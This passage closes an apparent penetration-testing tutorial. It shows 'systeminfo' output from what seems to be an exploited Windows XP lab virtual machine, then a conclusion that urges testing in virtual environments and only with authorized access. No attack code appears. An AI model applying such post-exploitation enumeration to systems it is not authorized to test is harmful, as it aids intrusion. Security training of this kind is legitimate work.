Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWSsystem32>systeminfo systeminfo Host Name: WINDOWSX-C7B000 OS Name: Microsoft Windows XP Professional OS Version: 5.1.2600 Service Pack 2 Build 2600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Uniprocessor Free Registered Owner: windowsxp Registered Organization: Product ID: 76487-640-8365391-23703 Original Install Date: 6/10/2013, 1:02:40 PM System Up Time: 0 Days, 2 Hours, 4 Minutes, 1 Seconds System Manufacturer: innotek GmbH System Model: VirtualBox System type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x86 Family 6 Model 58 Stepping 9 GenuineIntel ~2484 Mhz BIOS Version: VBOX – 1 Windows Directory: C:WINDOWS System Directory: C:WINDOWSsystem32 Boot Device: DeviceHarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk Total Physical Memory: 511 MB Available Physical Memory: 370 MB Virtual Memory: Max Size: 2,048 MB Virtual Memory: Available: 2,009 MB Virtual Memory: In Use: 39 MB Page File Location(s): C:pagefile.sys Domain: WORKGROUP Logon Server: N/A Hotfix(s): 1 Hotfix(s) Installed. [01]: Q147222 NetWork Card(s): 1 NIC(s) Installed. [01]: AMD PCNET Family PCI Ethernet Adapter Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 192.168.56.103 [/c] Conclusion There are a lot of ways and things we can do to enumerate and exploit vulnerable web-apps or services. This tutorial describes the basic things we can do to gather important information and exploit the most known vulnerable services using a couple of ways. The best secure way is to try every parameter on a virtual environment, before proceeding to run every of the above example, to real machine Servers with authorized access by the admin.